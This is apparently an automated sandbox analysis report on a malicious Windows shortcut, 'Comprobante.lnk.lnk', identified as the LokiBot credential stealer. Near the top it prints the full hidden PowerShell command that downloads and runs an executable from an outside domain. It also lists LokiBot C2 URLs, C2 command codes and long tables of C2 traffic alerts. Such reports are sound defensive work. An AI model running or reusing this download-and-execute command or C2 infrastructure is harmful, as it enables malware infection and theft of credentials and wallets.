Windows
Analysis Report
Comprobante.lnk.lnk
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 4552 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -Windo wStyle Hid den -Comma nd OpenWit h.exe;(new -object Sy stem.Net.W ebClient). DownloadFi le('https: //www.sodi umlaureths ulfatedesy royer.com/ flow/sfdka vhbsfvhahl bfabreaire uafrgfyarf dkabrbfvak ysrgfea/zd hkbgualsbi fbAFRAWYEG FYAUGEYGyw efafaer/ne zfdio.pif' ,'mjtjewi. exe');./'m jtjewi.exe ';(get-ite m 'mjtjewi .exe').Att ributes += 'Hidden'; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - OpenWith.exe (PID: 2872 cmdline:
"C:\Window s\system32 \OpenWith. exe" MD5: E4A834784FA08C17D47A1E72429C5109) - mjtjewi.exe (PID: 6956 cmdline:
"C:\Users\ user\Deskt op\mjtjewi .exe" MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB) - mjtjewi.exe (PID: 1392 cmdline:
C:\Users\u ser\Deskto p\mjtjewi. exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB) - mjtjewi.exe (PID: 876 cmdline:
C:\Users\u ser\Deskto p\mjtjewi. exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB) - mjtjewi.exe (PID: 3568 cmdline:
C:\Users\u ser\Deskto p\mjtjewi. exe MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Loki Password Stealer (PWS), LokiBot | "Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2 |
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security | ||
JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | ||
JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Windows_Trojan_Lokibot_1f885282 | unknown | unknown |
| |
Click to see the 36 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | ||
JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Windows_Trojan_Lokibot_1f885282 | unknown | unknown |
| |
Windows_Trojan_Lokibot_0f421617 | unknown | unknown |
| |
Click to see the 24 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:49.077565+0200 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.285873+0200 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:48.138102+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:49.427132+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:50.395968+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.138116+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:53.059614+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.313220+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.544536+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:58.316168+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.272737+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.670903+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.623467+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.448704+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.488048+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.428362+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.363793+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.386274+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.265208+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.224949+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.172629+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.997521+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.996788+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.112321+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.055508+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.916854+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.881238+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.059969+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.083633+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:18.023488+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.175709+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.592824+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.386915+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.246842+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.104473+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.029228+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:25.820375+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:26.851586+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:27.810227+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:28.697925+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:29.591807+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:30.413511+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:31.498785+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:32.743030+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:33.556187+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:35.239657+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:46.647501+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:47.487101+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:48.440836+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:49.258711+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:50.499694+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:51.287566+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.148748+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:52.981934+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.007169+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:54.945256+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:55.920209+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:57.220850+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:58.171912+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:59.151255+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:00.075267+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:01.051486+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:03.157629+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:04.115545+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:05.338912+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:06.283716+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:07.225458+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:08.313595+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:09.230403+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:10.331436+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:11.239806+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:12.172123+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:13.068985+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.008975+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:14.936067+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:15.929179+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:16.827330+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:17.703674+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:18.714301+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:19.547744+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:20.566222+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:21.356699+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:22.220181+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:23.369318+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.106031+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:24.910667+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:25.816016+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:26.659850+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:27.504132+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:28.311778+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:29.639445+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:30.646052+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:31.674682+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:32.502916+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:33.340490+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:34.448158+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:35.225001+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.015476+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:36.917140+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:37.931400+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:38.836712+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:39.681925+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:40.614660+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:41.558183+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:42.344416+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:43.251789+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:22:44.067474+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-03T09:20:32.181025+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64437 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64368 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64388 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 49717 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64348 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64371 | TCP |
2024-10-03T09:20:32.181025+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 49718 | TCP |
2024-10-03T09:20:51.445072+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 49713 | TCP |
2024-10-03T09:20:52.900738+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 49714 | TCP |
2024-10-03T09:20:55.160370+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 49715 | TCP |
2024-10-03T09:20:59.122929+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 55843 | TCP |
2024-10-03T09:21:01.459279+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64350 | TCP |
2024-10-03T09:21:02.297469+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64352 | TCP |
2024-10-03T09:21:03.202516+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64354 | TCP |
2024-10-03T09:21:04.268373+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64355 | TCP |
2024-10-03T09:21:05.205632+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64357 | TCP |
2024-10-03T09:21:06.216904+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64358 | TCP |
2024-10-03T09:21:07.101687+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64359 | TCP |
2024-10-03T09:21:08.062889+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64360 | TCP |
2024-10-03T09:21:08.918941+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64361 | TCP |
2024-10-03T09:21:09.844424+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64362 | TCP |
2024-10-03T09:21:10.841978+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64363 | TCP |
2024-10-03T09:21:11.926165+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64364 | TCP |
2024-10-03T09:21:12.885827+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64365 | TCP |
2024-10-03T09:21:13.771289+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64366 | TCP |
2024-10-03T09:21:14.606299+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64367 | TCP |
2024-10-03T09:21:16.922230+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64369 | TCP |
2024-10-03T09:21:17.872168+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64370 | TCP |
2024-10-03T09:21:21.433380+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64372 | TCP |
2024-10-03T09:21:22.239708+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64373 | TCP |
2024-10-03T09:21:23.095072+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64374 | TCP |
2024-10-03T09:21:23.953248+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64375 | TCP |
2024-10-03T09:21:24.880426+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64376 | TCP |
2024-10-03T09:21:25.674220+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64378 | TCP |
2024-10-03T09:21:26.693893+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64379 | TCP |
2024-10-03T09:21:27.639571+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64380 | TCP |
2024-10-03T09:21:28.553342+0200 | 2025483 | 1 | A Network Trojan was detected | 45.149.241.169 | 80 | 192.168.2.11 | 64381 | TCP |
